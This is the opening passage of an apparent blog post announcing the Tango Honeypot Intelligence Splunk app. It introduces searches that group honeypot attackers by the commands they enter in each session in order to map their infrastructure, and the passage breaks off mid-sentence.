The Splunk app, Tango Honeypot Intelligence, which I had the pleasure of working on for awhile, has finally been made official. Please check it out if you have some time, I would love some feedback.
In this post, we'll cover some searches that will help us identify the infrastructure that the attackers are using. We'll do this by grouping the attackers together based on the commands they enter during each session. By doing this, we can assume that the attacking IP addresses are somehow used